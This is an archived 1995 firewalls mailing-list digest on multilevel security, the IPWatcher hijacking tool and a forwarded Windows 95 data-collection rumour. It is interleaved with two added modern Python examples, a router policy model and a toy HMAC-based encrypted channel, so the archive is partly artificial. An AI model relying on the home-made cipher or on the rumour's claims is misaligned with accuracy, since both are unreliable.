Indeed, this is the classic approach that I know. However, I'm not saying put an A level system up to deal with MIME. I'm saying that some trusted technology can be used to keep the MIME that is coming from untrusted sources off systems that can't defend themselves. I propose that the way you do this is to use your approach in conjunction with an isolation mechanism that separates trusted Email from that which is suspect. For instance, the internal network's critical partitions are walled off by mandatory controls that only allow them to interoperate with others of their ilk. I can see a departmental PC that is reserved to such a partition in the face of the realization that a process engineer's PC that is outside of that partition will never cut it since they are downloading freeware drivers.
BTW, I'd sure love to hear the details about exactly how your SMG's configuration to run TCP/IP over Email and do NFS works. Or, was this a joke?

> Rigor is nice but every time rigor gets put up against
>technological progress, it loses. :(
>
> I'm not saying to trash rigor, but if you're going to be
>doing in-depth risk analysis all the time, you're going to have
>to make it fast or you'll get left behind. I've seen too many cases
>where an organization has been thinking real hard about a firewall
>and found out that while they were thinking the guys in the research
>lab put in a T1 line. :(

Yep. The cure is for the bosses to say three things:

1) Hey, guys - listen up. This new lab now holds our golden eggs. *All* traffic in and out of it will subscribe to the following rules (bla, bla, bla...)

2) Here is some money, a body, and my franchise for you to pay attention

3) I'll be back from time to time to check how well my rules are being followed. If I catch one (or all) of you messing around with the rules, I'll own your first born male child

In my experience, this is really ugly, expensive, and hard - and, it takes the discipline of hard-headed security engineering to make it work. Hang evaluations except for the parts that are needed: the ability to *actually* force certain traffic to be separated from certain other traffic. A B level system as part of an isolation mechanism to solve this problem - yes. A B level system for all of the isolation mechanism - no. Fact of the matter is that I usually only see this happen *after* the organization has had the hell scared out of it by an incident. Sadly, when it happens it's usually devastating. I've as many fear grenades as any security consultant. However, I prefer to get back to first order security engineering principles and ignore the ugly mess that surrounds trying to make everything on a private network flow through a convoluted evaluated mess that is impossible to use.
Slice off a chunk of the work that has been done in trusted systems, trim off the bad parts, and use the rest in the narrow scope of a well defined problem. I've a friend who travels the world's back woods widely on a shoe string. Rather than starve since he can't stomach the meat in open markets that is half rotten, he takes his sharp knife and trims off the bad parts and lives on a reduced level of sustenance. Most times, the piece of meat with rotten edges is the only alternative to having nothing to eat. Why don't we see anyone allowing their firewall builders to slice off a little chunk 'o B level to interconnect their mission critical applications?

RayK 8) - Better Living Through Authentication - I usually only speak for myself
Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423
Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu
But, as with everything else in life, this will change.

From firewalls-owner Wed Aug 2 02:00:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23414 for firewalls-outgoing; Wed, 2 Aug 1995 00:57:19 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23400 for ; Wed, 2 Aug 1995 00:57:17 -0700
From: puseya@allenovery.com
Received: from gatekeeper.allenovery.com(194.129.43.85) by miles via smap (V1.3) id sma023394; Wed Aug 2 00:57:07 1995
Received: by gatekeeper.allenovery.com; id AA06726; Wed, 2 Aug 95 07:58:10 GMT
Received: from unknown(193.36.241.84) by gatekeeper.allenovery.com via smap (V1.3) id sma006722; Wed Aug 2 07:57:47 1995
Received: from cc:Mail by ccmgate.allenovery.com id AA807378966; Wed, 02 Aug 95 08:23:43 GMT
Date: Wed, 02 Aug 95 08:23:43 GMT
Message-Id: <9507028073.AA807378966@ccmgate.allenovery.com>
To: firewalls@greatcircle.com
Subject: Which Firewall
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At the moment we are considering the Gauntlet firewall system on a Sun Sparcstation as our firewall.
Can anybody tell me if there are any integrity problems with this firewall or any other reasons why we should not consider it.

Many Thanks.

Andy Pusey

From firewalls-owner Wed Aug 2 02:32:38 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA27401 for firewalls-outgoing; Wed, 2 Aug 1995 02:25:37 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA27371 for ; Wed, 2 Aug 1995 02:24:41 -0700
From: bmanning@ISI.EDU
Received: from venera.isi.edu(128.9.0.32) by miles via smap (V1.3) id sma027364; Wed Aug 2 02:24:22 1995
Received: from zed.isi.edu by venera.isi.edu (5.65c/5.61+local-22) id ; Wed, 2 Aug 1995 02:23:16 -0700
Posted-Date: Wed, 2 Aug 1995 02:20:33 -0700 (PDT)
Message-Id: <199508020920.AA29400@zed.isi.edu>
Received: by zed.isi.edu (5.65c/4.0.3-4) id ; Wed, 2 Aug 1995 02:20:34 -0700
Subject: Re: IPWatcher
To: Cameron_A_P@ceo.sbic.co.za
Date: Wed, 2 Aug 1995 02:20:33 -0700 (PDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <9508021235.AA00151@zork.sbic.co.za> from "Cameron_A_P@ceo.sbic.co.za" at Aug 2, 95 08:35:03 am
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 641
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> Message:
> I have come across a package on Internet Called IPWatcher. This
> package renders Firewalls and Smart Cards Useless in that it allows
> the person using it to Hijack and take over an established connection.
>
> The URL to get more Info on this package is
> http://nad.infostructure.com/watcher.html
>
> My Question and problem is how do you prevent this from happening.
> Also are there other Hacker tools that can do this.

There are a number of other facilities to hijack sessions. The only way around it is end2end encryption. Then, although a session can be hijacked, it is crypted and therefore useless.
--bill

From firewalls-owner Wed Aug 2 05:00:22 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA02228 for firewalls-outgoing; Wed, 2 Aug 1995 04:54:30 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA02220 for ; Wed, 2 Aug 1995 04:54:28 -0700
Message-Id: <199508021154.EAA02220@miles.greatcircle.com>
Received: from cheops.anu.edu.au(150.203.76.24) by miles via smap (V1.3) id sma002209; Wed Aug 2 04:54:16 1995
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA105994192; Wed, 2 Aug 1995 21:49:52 +1000
From: Darren Reed
Subject: Re: IPWatcher
To: bmanning@ISI.EDU
Date: Wed, 2 Aug 1995 21:49:51 +1000 (EST)
Cc: Cameron_A_P@ceo.sbic.co.za, firewalls@greatcircle.com
In-Reply-To: <199508020920.AA29400@zed.isi.edu> from "bmanning@ISI.EDU" at Aug 2, 95 02:20:33 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1319
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from bmanning@ISI.EDU, sie said:
> >
> > Message:
> > I have come across a package on Internet Called IPWatcher. This
> > package renders Firewalls and Smart Cards Useless in that it allows
> > the person using it to Hijack and take over an established connection.
> >
> > The URL to get more Info on this package is
> > http://nad.infostructure.com/watcher.html
> >
> > My Question and problem is how do you prevent this from happening.
> > Also are there other Hacker tools that can do this.

IP watcher is nice and fine but it assumes you're going to be there 24 hours a day to catch the cracker that comes knocking at 2am. I'd prefer to be asleep with some knowledge that my network was safe than be thinking on whether or not I should be there watching, waiting... I'm more concerned that businesses will buy these and turn them inwards... (for better or worse). Seems like a nice tool for CERT-like people who want to watch things going on - it won't make a network more secure.
> There are a number of other facilities to hijack sessions.
> The only way around it is end2end encryption. Then, although
> a session can be hijacked, it is crypted and therefore useless.

Can't wait for crackers to start using encryption, can you? And yes, I've known them to use deslogin, etc...

darren

From firewalls-owner Wed Aug 2 05:27:38 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA02103 for firewalls-outgoing; Wed, 2 Aug 1995 04:40:30 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA02095 for ; Wed, 2 Aug 1995 04:40:28 -0700
Received: from relay3.uu.net(192.48.96.8) by miles via smap (V1.3) id sma002089; Wed Aug 2 04:39:45 1995
Received: from rssi by relay3.UU.NET with SMTP id QQzbas22198; Wed, 2 Aug 1995 07:38:29 -0400
Received: from pail.rssi.com by rssi (4.1/SMI-4.1) id AA29943; Wed, 2 Aug 95 07:40:46 EDT
Received: by pail.rssi.com (5.0/SMI-SVR4) id AA07806; Wed, 2 Aug 1995 07:38:37 +0500
Date: Wed, 2 Aug 1995 07:38:37 +0500
From: bvvanor@rssi.rssi.com (Brad VanOrden)
Message-Id: <9508021138.AA07806@pail.rssi.com>
To: firewalls@greatcircle.com, sjs@sunthing.sjsinc.com
Subject: Re: Huge gapping hole in Win95
X-Sun-Charset: US-ASCII
Content-Length: 9631
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Stefan,

Have you tried it yourself? From the people in my office who have installed it and from the trade press, I get information that states this is all optional.

Brad

----- Begin Included Message -----

From firewalls-owner@GreatCircle.COM Tue Aug 1 17:30:26 1995
From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman)
To: firewalls@greatcircle.com
Subject: Huge gapping hole in Win95
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Folks:

1). Please see the posting below my sig line from comp.risks

2). I can imagine the following scenario:

- "*user*" thrilled with his new upgrade to Win95 runs out to Fry's, Egghead... and buys a modem unbeknownst to the security types.
- computer is also running a TCP/IP stack and PCNFS to access all of the corporate resources behind the firewall.
- "*user*" fires up MS-Network which then transmits the entire corporate filesystem topology to Microsoft.
- security types never know that internal information has been severely compromised.

3). Am I wrong here??? I find the potential for this scenario both realistic and horrifying!!!!

4). In addition to the security implications, this might actually be a way to tame the MS beast... if enough corporations get probed in this manner, the lawyers will have lots of fun putting together a class-action lawsuit to make MS (the original home of proprietary information and disclosures) much, much poorer for stealing trade secrets, copyrights, etc.... ALAS... I love it....

5). I think this also has implications for the MS TCP/IP port discussion that has been going on on this list recently. I.e., as the article points out, if they have your filesystem structure and you are not blocking that port, they could grab any file that they want and you would never know it...

Regards,

b c++'ing u, %-)

sjs

-------------------------------------------------------------------------------
Stefan Jon Silverman - President
SJS Associates, N.A., Inc.
572 Chestnut Street
Distributed Systems Architecture & Implementation
San Francisco, Ca. 94133
Phone: 415 989 2741
E-mail: sjs@sjsinc.com
Cell: 415 519 3494
-------------------------------------------------------------------------------
Weebles wobble, but they don't fall down!!!
-------------------------------------------------------------------------------

Date: 30 Jun 1995 07:47:48 U
From: "Paul Saffo"
Subject: Warning on Using Win95

From PLS_MCI_MAIL
FWD>>Warning on Using Win95

Date: 6/26/95 8:44 PM
From: jbreyer@accel.com
Subject: Warning on Using Win95

[Update on RISKS-17.13 item]

Believe it or not, this is not Net humor but serious. It would otherwise be outstanding satire!

Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week

Microsoft officials confirm that beta versions of Windows 95 include a small viral routine called Registration Wizard. It interrogates every system on a network gathering intelligence on what software is being run on which machine. It then creates a complete listing of both Microsoft's and competitors' products by machine, which it reports to Microsoft when customers sign up for Microsoft's Network Services, due for launch later this year.

"In Short" column, page 88, _Information Week_ magazine, May 22, 1995

The implications of this action, and the attitude of Microsoft to plan such action, beggars the imagination.

An update on this. A friend of mine got hold of the beta test CD of Win95, and set up a packet sniffer between his serial port and the modem. When you try out the free demo time on The Microsoft Network, it transmits your entire directory structure in background. This means that they have a list of every directory (and, potentially every file) on your machine. It would not be difficult to have something like a FileRequest from your system to theirs, without you knowing about it. This way they could get ahold of any juicy routines you've written yourself and claim them as their own if you don't have them copyrighted.

Needless to say, I'm rather annoyed about this. So spread the word as far and wide as possible: Steer clear of Windows 95. There's nothing to say that this "feature" will be removed in the final release.
[GML addition: Prodigy was accused of doing something similar several years ago. In that case it was not nearly as threatening due to: 1) it was = limited to a single PC, 2) Prodigy couldn't do much with the info (i.e. they could not pursue you for copyright infringement, nor were they trying to expand into so many businesses the way Microsoft is).] ----- End Included Message ----- From firewalls-owner@GreatCircle.COM Tue Aug 1 17:30:26 1995 From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) To: firewalls@greatcircle.com Subject: Huge gapping hole in Win95 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks: 1). Please see the posting below my sig line from comp.risks 2). I can imagine the following scenario: - "*user*" thrilled with his new upgrade to Win95 runs out to Fry's, Egghead...and buys a modem unbeknownst to the security types. - computer is also running a TCP/IP stack and PCNFS to access all of the corporate resources behind the firewall. - "*user*" fires up MS-Network which then transmits the entire corporate filesystem topology to MicroSoft. - security types never know that internal information has been severely compromised. 3). Am I wrong here??? I find the potential for this scenario both realistic and horrifying!!!! 4). In addition to the security implications, this might actually be a way to tame the MS beast...if enough corporations get probbed in this manner, the lawyers will have lots of fun putting together a class-action lawsuit to make MS (the original home of proprietary information and disclosures) much, much poorer for stealing tradesecrets, copyrights, etc....ALAS...I love it.... 5). I think this also has implications for the MS TCP/IP port discussion that has been going on on this list recently. I.e., as the article points out, if they have your filesystem structure and you are not blocking that port, they could grab any file that they want and you would never know it... 
Regards, b c++'ing u, %-)

sjs
-------------------------------------------------------------------------------
Stefan Jon Silverman - President                    SJS Associates, N.A., Inc.
572 Chestnut Street          Distributed Systems Architecture & Implementation
San Francisco, Ca. 94133
Phone: 415 989 2741   E-mail: sjs@sjsinc.com   Cell: 415 519 3494
-------------------------------------------------------------------------------
Weebles wobble, but they don't fall down!!!
-------------------------------------------------------------------------------
Date: 30 Jun 1995 07:47:48 U
From: "Paul Saffo"
Subject: Warning on Using Win95

>From PLS_MCI_MAIL
FWD>>Warning on Using Win95
Date: 6/26/95 8:44 PM
From: jbreyer@accel.com
Subject: Warning on Using Win95

[Update on RISKS-17.13 item]

Believe it or not, this is not Net humor but serious. It would otherwise be outstanding satire!

Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week

Microsoft officials confirm that beta versions of Windows 95 include a small viral routine called Registration Wizard. It interrogates every system on a network gathering intelligence on what software is being run on which machine. It then creates a complete listing of both Microsoft's and competitors' products by machine, which it reports to Microsoft when customers sign up for Microsoft's Network Services, due for launch later this year.

"In Short" column, page 88, _Information Week_ magazine, May 22, 1995

The implications of this action, and the attitude of Microsoft to plan such action, beggar the imagination.

An update on this. A friend of mine got hold of the beta test CD of Win95, and set up a packet sniffer between his serial port and the modem. When you try out the free demo time on The Microsoft Network, it transmits your entire directory structure in background. This means that they have a list of every directory (and, potentially, every file) on your machine.
It would not be difficult to have something like a FileRequest from your system to theirs, without you knowing about it. This way they could get ahold of any juicy routines you've written yourself and claim them as their own if you don't have them copyrighted.

Needless to say, I'm rather annoyed about this. So spread the word as far and wide as possible: Steer clear of Windows 95.

There's nothing to say that this "feature" will be removed in the final release.

[GML addition: Prodigy was accused of doing something similar several years ago. In that case it was not nearly as threatening due to: 1) it was limited to a single PC, 2) Prodigy couldn't do much with the info (i.e. they could not pursue you for copyright infringement, nor were they trying to expand into so many businesses the way Microsoft is).]

From firewalls-owner Wed Aug 2 05:30:27 1995
From: Cameron_A_P@ceo.sbic.co.za
Date: Wed, 2 Aug 95 13:57:42+2
Message-Id: <9508021757.AA00093@zork.sbic.co.za>
To: bmanning@ISI.EDU, firewalls@Greatcircle.com
Subject: Reply to: Re: IPWatcher

CEO comments:
From: Cameron A P:SBIC
Date: ## 08/02/95 12:12 ##

Thanks. That is what I thought. The problem is that the vendors of various Unix systems cannot supply encryption to sites outside the USA.
Preceding Message:
From: bmanning@ISI.EDU:smtp
Date: ## 08/02/95 11:25 ##

> Message:
> I have come across a package on Internet called IPWatcher. This
> package renders firewalls and smart cards useless in that it allows
> the person using it to hijack and take over an established connection.
>
> The URL to get more info on this package is
> http://nad.infostructure.com/watcher.html
>
> My question and problem is how do you prevent this from happening.
> Also are there other hacker tools that can do this.

There are a number of other facilities to hijack sessions. The only way around it is end2end encryption. Then, although a session can be hijacked, it is crypted and therefore useless.

--bill

From firewalls-owner Wed Aug 2 06:30:10 1995
Date: Wed, 2 Aug 1995 08:18:24 -0400
From: Ted Doty
Message-Id: <199508021218.IAA01947@kgbvax.network.com>
To: njb@knoware.nl
Subject: Re: Multilevel systems
In-Reply-To: Mail from 'njb@knoware.nl (Niels Bjergstrom)' dated: Wed, 2 Aug 1995 01:50:28 +0200
Cc: firewalls@greatcircle.com

On Wed, 2 Aug 1995 01:50:28 +0200, njb@knoware.nl (Niels Bjergstrom) wrote:

What is the difference between THE firewall and A firewall? I find it difficult to see any great conceptual difference between the protection (firewall) you install to separate parts of a WAN and the protection (firewall) you install to separate LANs.
In fact, as the problems you touch upon really start to dawn on management types I suspect that we shall be installing more firewalls between intra-organisational subnets than between internal nets and the Internet.

Not if they all run at T1 speed or less. ;-)

Please excuse me for getting grumpy about performance issues _again_, but this is _exactly_ the point: how can I connect my Personnel department to my corporate FDDI (or, God save us, OC-3) backbone?

While it is probably correct that a single-point multilevel solution is only a viable solution in simple cases (e.g. enforced by a three-NIC router connected to the Internet to one side, to the campus network to the second, and to the university administrative network to the third), multi-point multilevel solutions (or security step solutions, whatever we should call them) seem to me to be a reasonable solution in cases where you have a number of domains interconnected, each having different security requirements.

And just who _doesn't_ have multiple domains? Personnel, Finance, Senior Management (_I_ don't want to be the one to tell them that they got hacked because they weren't important enough ...) Even Universities are now worried (this is A Very Good Thing), because they have all the above PLUS grade databases. Probably only really small companies don't fit well into this paradigm.

-- 
- Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation      | phone: +1 301 596-2270
8965 Guilford Road, Suite 250              | fax: +1 410 381-3320
Columbia, MD, 21046 USA                    | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental.
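The three-NIC router in the exchange above, modelled as an added example (this is not code from the list or from any vendor; interface names, prefixes, hosts and ports are constructed for the illustration). Each (ingress, egress) pair of security domains gets its own explicit allow list and everything else is dropped, which is the "several domains, each with its own requirements" design Ted argues for; an audit function checks the one invariant a reviewer of such a policy would ask about first, that no rule lets the Internet side reach the administrative network.

```python
"""Model of a three-interface separation router (added example, not from the thread).

Interfaces: "inet" (Internet), "campus" (campus network), "admin" (administrative
network). The policy is default-deny: a packet is forwarded only if a rule for
its (ingress, egress) interface pair explicitly permits it. All prefixes, hosts
and ports below are constructed for the example.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass(frozen=True)
class Packet:
    ingress: str      # interface the packet arrived on
    src: str
    dst: str
    proto: str
    dport: int


@dataclass(frozen=True)
class Rule:
    ingress: str
    egress: str
    dst_net: str
    proto: str
    dport: Optional[int]   # None means any destination port


# Internal prefixes behind each interface (constructed). Anything outside them
# is treated as living on the Internet side.
INTERNAL_NETS = {
    "campus": ip_network("10.1.0.0/16"),
    "admin": ip_network("10.2.0.0/16"),
}

# Default-deny policy: only what is listed here is forwarded.
POLICY: List[Rule] = [
    # campus users may open TCP connections to the Internet
    Rule("campus", "inet", "0.0.0.0/0", "tcp", None),
    # the only thing the Internet may reach is the campus mail relay
    Rule("inet", "campus", "10.1.0.10/32", "tcp", 25),
    # campus administrators reach the grades server over ssh, nothing else
    Rule("campus", "admin", "10.2.0.5/32", "tcp", 22),
    # there is deliberately no inet -> admin rule: that path stays closed
]


def interface_for(addr: str) -> str:
    """Interface an address lives behind (Internet if no internal net matches)."""
    a = ip_address(addr)
    for name, net in INTERNAL_NETS.items():
        if a in net:
            return name
    return "inet"


def decide(pkt: Packet, policy: List[Rule] = POLICY) -> str:
    """Return 'accept' or 'drop' for a packet arriving on pkt.ingress."""
    # anti-spoofing: the source must belong to the interface it arrived on
    if interface_for(pkt.src) != pkt.ingress:
        return "drop"
    egress = interface_for(pkt.dst)
    if egress == pkt.ingress:        # not a forwarding case for this router
        return "drop"
    for r in policy:
        if (r.ingress == pkt.ingress and r.egress == egress
                and r.proto == pkt.proto
                and ip_address(pkt.dst) in ip_network(r.dst_net)
                and (r.dport is None or r.dport == pkt.dport)):
            return "accept"
    return "drop"


def audit(policy: List[Rule]) -> List[Rule]:
    """Review check: every rule that would let the Internet reach the admin net."""
    return [r for r in policy if r.ingress == "inet" and r.egress == "admin"]


if __name__ == "__main__":
    samples = [
        Packet("campus", "10.1.0.50", "198.51.100.7", "tcp", 80),   # accept
        Packet("inet", "198.51.100.7", "10.1.0.10", "tcp", 25),     # accept
        Packet("inet", "198.51.100.7", "10.2.0.5", "tcp", 22),      # drop: no inet->admin rule
        Packet("campus", "10.1.0.50", "10.2.0.5", "tcp", 22),       # accept
        Packet("campus", "10.1.0.50", "10.2.0.5", "tcp", 80),       # drop: wrong port
        Packet("inet", "10.2.0.9", "10.1.0.10", "tcp", 25),         # drop: spoofed source
    ]
    for p in samples:
        print(p.ingress, p.src, "->", p.dst, p.proto, p.dport, decide(p))
    print("audit problems:", audit(POLICY))
```

The point of keeping the policy keyed on interface pairs is that the admin domain's exposure can be read off directly: `audit` only has to look for rules naming the pair, not reason about address ranges, which is where the "traffic routed around the firewall" class of mistake usually hides.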
From firewalls-owner Wed Aug 2 06:50:32 1995
Date: Wed, 2 Aug 1995 08:03:52 -0400
From: Ted Doty
Message-Id: <199508021203.IAA01938@kgbvax.network.com>
To: kaplan@bpa.arizona.edu
Subject: RE: Using miltilevel systems for firewalls
In-Reply-To: Mail from 'kaplan@bpa.arizona.edu (Ray Kaplan)' dated: Tue, 1 Aug 1995 14:18:22 -0500
Cc: firewalls@greatcircle.com

On Tue, 1 Aug 1995 14:18:22 -0500, kaplan@bpa.arizona.edu (Ray Kaplan) wrote:

Perhaps, by definition. One interesting question is whether or not this is necessary to reach the goal of a trusted system. Consider that the only way we seem to know how to end up with something (anything) that works is to build it according to our best ideas, deploy it, and hack on it until it works! Maybe it has to work this way to end up with something that can actually be trusted?

Note that a formally evaluated product is not necessarily hack-proof. Would an Orange Book analysis of TCP have showed the fragmented header problem? I think not.

>The European ITSEC seems to be taking a much more corporate-friendly
>approach to evaluations: companies hire organizations (CLEFs) that do the
>evaluation, rather than relying on a (free but overworked - and therefore
>slow) NCSC. Things seem to run much faster, with much lower risk for
>the corporation and (therefore) lower cost to the customers who buy the
>device.

Yes indeed.
I have always wondered about getting into the "commercial system evaluation" business with some sort of simpler scheme that would test against the client's requirements. The problem has always been the HUGE amount of $ required to equip a lab. The labs that I see my clients using to test their client / server stuff before they deploy them start in the neighborhood of $1megabuck and have a staff of 10 wizards from various disciplines, plus a gazillion consultants available for piece work. Anyone got about $10mil loose that they can seed this with? ;)

Evaluation is not so much about testing; rather, it is an analysis of the design of the system. In this, it is sort of like the "you know it's secure because you read the source code" done right - people actually sit down and do design reviews. Probably a lot more expensive than filling a lab with test equipment. ;-)

-- 
- Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation      | phone: +1 301 596-2270
8965 Guilford Road, Suite 250              | fax: +1 410 381-3320
Columbia, MD, 21046 USA                    | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental.
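Returning to the IPWatcher thread above (Bill Manning's point that with end-to-end encryption a session can still be hijacked but is then useless to the hijacker): an added example, not code from the list, that makes the argument concrete with a toy authenticated channel built only from the Python standard library. The shared secret is a constructed stand-in for whatever key exchange the two endpoints would really use, and the HMAC-based keystream and MAC are illustrative constructions rather than a recommended cipher suite.

```python
"""Added example (not code from the list): why end-to-end encryption with
integrity protection makes a hijacked session useless.

Two endpoints share a secret. Every segment carries a sequence number, is
encrypted under a keystream derived from that sequence number, and is
authenticated with a MAC over (sequence number, ciphertext). A party on the
path without the secret can observe and inject segments, but cannot read
them, forge new ones, alter them, or replay old ones and have them accepted.
Standard library only: HMAC-SHA256 serves as the keystream PRF and as the MAC.
"""
import hashlib
import hmac
import struct

SHARED_SECRET = b"constructed demo secret - agreed out of band"   # assumption
TAG_LEN = 32   # bytes of HMAC-SHA256 output
SEQ_LEN = 8    # 64-bit sequence number


def derive_keys(secret: bytes):
    """Independent keys for confidentiality and for integrity."""
    k_enc = hmac.new(secret, b"encryption", hashlib.sha256).digest()
    k_mac = hmac.new(secret, b"integrity", hashlib.sha256).digest()
    return k_enc, k_mac


def keystream(k_enc: bytes, seq: int, length: int) -> bytes:
    """PRF in counter mode: a fresh keystream for every (sequence number, block)."""
    out = b""
    block = 0
    while len(out) < length:
        out += hmac.new(k_enc, struct.pack(">QI", seq, block), hashlib.sha256).digest()
        block += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Sender:
    def __init__(self, secret: bytes):
        self.k_enc, self.k_mac = derive_keys(secret)
        self.seq = 0

    def send(self, plaintext: bytes) -> bytes:
        """Return a segment laid out as seq || ciphertext || tag."""
        header = struct.pack(">Q", self.seq)
        ciphertext = xor_bytes(plaintext, keystream(self.k_enc, self.seq, len(plaintext)))
        tag = hmac.new(self.k_mac, header + ciphertext, hashlib.sha256).digest()
        self.seq += 1
        return header + ciphertext + tag


class Receiver:
    def __init__(self, secret: bytes):
        self.k_enc, self.k_mac = derive_keys(secret)
        self.expected_seq = 0

    def receive(self, segment: bytes):
        """Return the plaintext, or None if the segment must be discarded."""
        if len(segment) < SEQ_LEN + TAG_LEN:
            return None
        header = segment[:SEQ_LEN]
        ciphertext = segment[SEQ_LEN:-TAG_LEN]
        tag = segment[-TAG_LEN:]
        expected_tag = hmac.new(self.k_mac, header + ciphertext, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected_tag):
            return None                 # forged, or modified in transit
        (seq,) = struct.unpack(">Q", header)
        if seq != self.expected_seq:
            return None                 # replayed or out-of-order segment
        self.expected_seq += 1
        return xor_bytes(ciphertext, keystream(self.k_enc, seq, len(ciphertext)))


def demo() -> dict:
    """Legitimate traffic versus what someone on the path can do with it."""
    alice, bob = Sender(SHARED_SECRET), Receiver(SHARED_SECRET)
    seg1 = alice.send(b"ls -l /etc")
    out = {"legit": bob.receive(seg1)}                       # b"ls -l /etc"
    out["eavesdrop_sees_plaintext"] = b"ls -l /etc" in seg1  # False
    out["replay"] = bob.receive(seg1)                        # None: seq already consumed
    hijacker = Sender(b"hijacker does not know the secret")
    hijacker.seq = bob.expected_seq                          # even with the right seq guess
    out["injected"] = bob.receive(hijacker.send(b"injected command"))   # None
    seg2 = alice.send(b"cat report.txt")
    tampered = seg2[:SEQ_LEN] + bytes([seg2[SEQ_LEN] ^ 0x01]) + seg2[SEQ_LEN + 1:]
    out["tampered"] = bob.receive(tampered)                  # None: tag mismatch
    out["legit2"] = bob.receive(seg2)                        # b"cat report.txt"
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Note what this does and does not buy: confidentiality, integrity and freshness of each segment no longer depend on who sits between the endpoints, but availability still does, since a party on the path can drop segments or reset the underlying connection. That is the sense in which the hijacked session is "useless" rather than impossible.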
From firewalls-owner Wed Aug 2 07:14:07 1995
Date: Wed, 2 Aug 1995 07:55:24 -0400
From: Ted Doty
Message-Id: <199508021155.HAA01931@kgbvax.network.com>
To: kaplan@bpa.arizona.edu, mdr@vodka.sse.att.com
Subject: Re: Re: Using miltilevel systems for firewalls
In-Reply-To: Mail from 'kaplan@bpa.arizona.edu (Ray Kaplan)' dated: Tue, 1 Aug 1995 14:18:15 -0500
Cc: firewalls@greatcircle.com

On Tue, 1 Aug 1995 14:18:15, kaplan@bpa.arizona.edu (Ray Kaplan) wrote:

>> 2) Most organizations are more interested in simply "getting that
>> connectivity going" than they are in doing
>> architecture/design/implementation that actually meets their security policy
>> (be it granular enough or not.) What I commonly hear: "Security? Yeah,
>> 'gimmie a little 'o that, will ya?"

>Sad but true. But the new push for connectivity to the internet may
>force companies to take a new look at host level security.

Having thought about this for a while now, I think that the Internet is only *part* of the problem (admittedly, a big, huge, hairy part). We are not only in the "networking" revolution, but we're just getting close to completing the "computing to the masses" revolution, too. Ten years ago, the data all lived on the Mainframe, and had cypherlocks and RACF and hordes of IS folks to protect it. POLICY was simple(r) then, because there were much better access controls, and the data was centrally administered.
Now we're all "Thriving On Chaos", driving information down to the user's desktop. Heck, I'm writing this using Linux. Forget Windows 95, I get this for *free*. Remember the old saying: "Old VAXes never die, they just get clustered"? The new one is "Old 486s never die, they just become bitchin workstations with Linux/GNU/X/MUDs/etc."

Management understanding of these issues is way behind. The obvious problem is Phyber Optik hacking in from the `net and looking thru the Personnel files. The less obvious problem is ensuring the integrity (much less often, the privacy) of corporate data, from all threats. The risk to data is much worse than it was in the mainframe days. Consider what is NOT considered: natural disasters, hardware failures, malicious deletion or modification, accidental deletion or modification, sabotage. Note that hackers should fall into one of these categories, and firewalls only protect against a certain, very well bounded class of these risks. (a quick note: the mainframe guys DO think about this; it's the UNIX/DOS world that doesn't.)

Orange Book would help some if the evaluation process wasn't so horribly broken. They at least have done a nice job describing how to separate data. Disaster Recovery Plans cover a multitude of sins; a good centralized backup and off-site archiving system will give you a lot of leeway, security-wise.

I think that maybe the issue shouldn't be phrased as "Bad old Management doesn't understand Internet Security and Firewalls" (they don't; get over it). Rather, we need to start learning corporate-speak concerning data integrity issues. Once this happens, we'll probably see some pretty decent progress.
-- 
- Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation      | phone: +1 301 596-2270
8965 Guilford Road, Suite 250              | fax: +1 410 381-3320
Columbia, MD, 21046 USA                    | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental.

From firewalls-owner Wed Aug 2 07:30:39 1995
Date: Wed, 2 Aug 1995 09:17:31 -0500 (CDT)
From: Oliver Friedrichs
To: Cameron_A_P@ceo.sbic.co.za
Cc: firewalls@greatcircle.com
Subject: Re: IPWatcher
In-Reply-To: <9508021235.AA00151@zork.sbic.co.za>

On Wed, 2 Aug 1995 Cameron_A_P@ceo.sbic.co.za wrote:

> My Question and problem is how do you prevent this from happening.

